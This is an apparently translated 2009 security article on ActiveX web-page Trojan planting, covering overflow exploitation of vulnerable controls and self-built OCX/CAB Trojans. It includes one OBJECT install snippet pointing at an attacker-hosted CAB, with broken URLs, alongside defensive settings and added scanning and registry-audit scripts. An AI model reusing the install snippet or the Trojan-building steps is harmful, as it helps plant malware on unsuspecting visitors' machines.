Dissecting ActiveX web-page Trojan planting: intrusion in the name of installation (Vulnerability Warning, Heiba Security Net / 黑吧安全网)

ID MYHACK58:62200922402
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2009-03-05T00:00:00


Once upon a time, ActiveX was the main technical means by which rogue software "killed" its way onto users' machines. Today most of that rogue software is dead, yet ActiveX never left people's field of view: web-page Trojan planters (挂马, literally "hanging a horse", i.e. planting a Trojan in a web page) took a fancy to it, and ActiveX-based planting has grown into one of the main planting methods.

North Shore Team, Zhang Guiling: senior security engineer, working in the security industry for more than ten years.

ActiveX was developed by Microsoft. Microsoft's programmers seem to have thought the world too kind, assuming nobody would ever use ActiveX to do evil. Back in the years when rogue software was rampant, a site calling itself "XX Babes Video Chat" used seduction to entice users to actively install the site's ActiveX video-chat control.

That ActiveX control not only tracked the user's network activity on its own initiative, but also popped up advertisements, uploaded the user's Word documents and carried out other rogue behaviour. As more and more rogue software used ActiveX for evil, Microsoft reluctantly added ActiveX verification measures in IE7. Now every ActiveX control in IE7 is blocked first, and no longer pops up an installation window by itself as before.

Mini encyclopedia: ActiveX is Microsoft's name for a series of strategic object-oriented programming technologies and tools; an ActiveX control must be installed before it can be used.

Who made ActiveX planting so popular?

In the years when rogueware grew wild, rogue programs behaved like bandits fighting bandits: they frequently came to blows over the important positions on the user's computer, so many techniques originally used to build viruses were applied to these rogue programs. Later the viruses started learning from rogue software in turn; some techniques used by rogueware were adopted by viruses, and ActiveX planting is probably the technique viruses learned from rogue software most thoroughly.

Encyclopedia: most browsers do not support ActiveX as eagerly as IE does. Although Firefox, Netscape and other browsers support ActiveX to varying degrees, the browser where ActiveX causes the most trouble is still IE.

That ActiveX can be used for web-page Trojan planting comes down mainly to its authentication mechanism. Early on, if a site required an ActiveX control to be installed before some content could be viewed, then when you visited that site the control would repeatedly pop up prompts asking you to install it, and many users, for one reason or another, clicked "OK" and allowed the control to install.

It is like walking down the road with a crowd of people stepping in front of you one after another to declare their intentions: you can nod in agreement or shake your head in refusal, and everyone you nod to becomes your friend, free to come and go in your home. The frightening part is that some of these "friends" turn out to be thieves or hooligans.

Currently there are two main forms of ActiveX-based planting: one exploits an overflow vulnerability in a legitimate program's ActiveX control, the other writes a malicious ActiveX Trojan outright, disguising it as a control that seems to offer some feature and tricking the user into installing it. The cases below demonstrate how hackers use ActiveX to plant Trojans.

ActiveX planting: attack and defence record

Method 1: planting through a vulnerability


The most common way hackers use ActiveX to plant a Trojan on a web page is to exploit vulnerable ActiveX controls: an ActiveX control already present on the user's system is triggered, and the Trojan is implanted into the user's computer without their knowledge.

Famous examples of attacks exploiting vulnerabilities in software ActiveX controls are the Flash and RealPlayer ActiveX vulnerability planting schemes; the ActiveX vulnerabilities in these programs caused great harm, and RealPlayer in particular is still being used by hackers to plant Trojans through its ActiveX vulnerabilities.

Next we take the DjVu ActiveX control vulnerability as an example to explain the concrete planting steps. First the malicious code is typed into WordPad and saved as an HTML file; then IFRAME code is used to embed the generated HTML file into a normal web page. In this case, when the URL is opened on a machine that has the vulnerable DjVu ActiveX control, the local Calculator program is launched. Hackers are usually not so kind: they modify the shellcode to download the malware they specify, and then wait for users to open the relevant site and get caught.

Mini encyclopedia: the DjVu ActiveX control is a tool for compressing graphics files; it overflows when handling an overly long ImageURL attribute parameter.

Defence

For planting that exploits ActiveX vulnerabilities, the best prevention is to use a browser other than IE, such as Firefox, Maxthon or 360 Security Browser. In addition, it is best to install anti-planting (anti-挂马) software.

Method 2: writing an ActiveX Trojan


ActiveX Trojans spread by exploiting the habit some users have of blindly clicking the Install button on the ActiveX prompt that pops up on a web page. Many users cannot tell which ActiveX controls are harmless and which are harmful.

These ActiveX Trojans hide behind tempting guises such as video chat or babe galleries, and users who cannot resist the temptation will eagerly install the ActiveX Trojan embedded in the page.

Writing an ActiveX Trojan requires some programming background and the whole process is fairly complex; for reasons of space, we only sketch the general writing process here for readers who want to become security engineers.

First, the hacker writes an OCX control with download or other malicious functionality; this is the heart and soul of the ActiveX Trojan. Then the hacker writes an INF file that configures the installation's security settings, and uses a CAB compression tool such as WinCAB to compress and package the two files into a CAB file.

Finally, the hacker uploads the file to their own website and writes the code that calls and installs the ActiveX control into a web page, then waits for browsing users to take the bait.

[Image: Dissecting ActiveX web-page Trojan planting: intrusion in the name of installation]

The calling code is as follows:

<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237 codeBase= cab#version=1,0,0,0> <PARAM NAME="Setup" VALUE="http:// ocx"> </OBJECT>

This ActiveX Trojan has no signature verification, so normally it would not be allowed to install, but there are still ways to break through these security restrictions.
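A defender-side triage check covering both planting forms described above (the overlong ImageURL-style property value of Method 1 and the remote CAB/Setup install pattern of Method 2), written as an added Python example that is not part of the original article; the CLSIDs, example.invalid hosts and the 1024-character threshold are constructed placeholders.

```python
from html.parser import HTMLParser

LONG_PARAM = 1024  # chars; chosen threshold (assumption), far above any sane URL-type value

class ActiveXScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (indicator, clsid, detail)
        self._clsid = None   # classid of the OBJECT currently open

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # html.parser lowercases names
        if tag == "object":
            self._clsid = a.get("classid", "").lower().replace("clsid:", "")
            codebase = a.get("codebase", "")
            # Method 2: OBJECT pulling a CAB from a remote site to install a control
            if ".cab" in codebase.lower():
                self.findings.append(("remote-cab-install", self._clsid, codebase))
        elif tag == "param":
            value = a.get("value", "")
            # Method 1: overlong property value (the DjVu ImageURL overflow pattern)
            if len(value) > LONG_PARAM:
                detail = f"{a.get('name', '?')}={len(value)} chars"
                self.findings.append(("oversized-param", self._clsid, detail))
        elif tag == "iframe":
            # Planted pages are typically embedded through a zero-size IFRAME
            if a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0":
                self.findings.append(("hidden-iframe", None, a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "object":
            self._clsid = None

def scan_html(text):
    scanner = ActiveXScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample page (placeholder CLSIDs and example.invalid hosts).
SAMPLE_PAGE = (
    '<html><body><p>ordinary content</p>'
    '<object classid="clsid:00000000-0000-0000-0000-000000000001" '
    'codebase="http://example.invalid/setup.cab#version=1,0,0,0">'
    '<param name="Setup" value="http://example.invalid/x.ocx"></object>'
    '<object classid="clsid:00000000-0000-0000-0000-000000000002">'
    '<param name="ImageURL" value="' + "A" * 2000 + '"></object>'
    '<iframe src="http://example.invalid/planted.html" width="0" height="0"></iframe>'
    '</body></html>'
)
```

Run `scan_html` over pages captured from a proxy or a crawler; each finding carries the CLSID so a hit can be matched against the controls actually installed on the user base.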


To avoid ActiveX Trojan attacks, it is enough to prevent the ActiveX Trojan from being invoked and run.

The best defence against this method of planting is still on the client: in Internet Explorer, click "Tools → Internet Options → Security → Custom Level", set the security level to "High", under "ActiveX controls and plug-ins" set items 2 and 3 to "Disable" and the remaining entries to "Prompt", then click "OK". With these settings, browsing the web with IE can effectively avoid ActiveX Trojan attacks.
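To verify the zone settings from the procedure above across many machines, a defender can audit a `reg export` of the IE Internet zone key instead of clicking through each dialog. This added Python example is not from the original article; the sample export is constructed, and the choice of which items must be Disable versus Prompt is this block's assumption, since the article names the items only by position.

```python
import re

# Value names under the IE Internet zone key (HKCU\...\Internet Settings\Zones\3)
# for the ActiveX items audited here; data encodes 0 = Enable, 1 = Prompt, 3 = Disable.
ACTIVEX_VALUES = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
}
STATE = {0: "Enable", 1: "Prompt", 3: "Disable"}
# Target states: this block's assumption of which items the article means
# by "disable" and "prompt" (Disable also satisfies a Prompt target).
POLICY = {"1001": "Prompt", "1004": "Disable", "1200": "Prompt", "1201": "Disable"}

VALUE_LINE = re.compile(r'^"(\d{4})"=dword:([0-9a-fA-F]{8})$')

def parse_reg_export(text):
    """Return {value_name: int} for the numeric URLACTION values in a .reg export."""
    found = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line.strip())
        if m:
            found[m.group(1)] = int(m.group(2), 16)
    return found

def audit_zone(text):
    """Return (value, description, current, expected, ok) for each audited item."""
    values = parse_reg_export(text)
    report = []
    for vid, desc in ACTIVEX_VALUES.items():
        raw = values.get(vid)
        current = "missing" if raw is None else STATE.get(raw, f"unknown({raw})")
        expected = POLICY[vid]
        ok = current == expected or (current == "Disable" and expected == "Prompt")
        report.append((vid, desc, current, expected, ok))
    return report

def failing_settings(text):
    """Only the items that still need hardening."""
    return [r for r in audit_zone(text) if not r[4]]

# Constructed sample export of a weakly configured zone (not from the article).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"CurrentLevel"=dword:00011000
"1001"=dword:00000001
"1004"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000003
"""
```

A "missing" value means the zone template default applies, so treat it as unverified rather than compliant.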
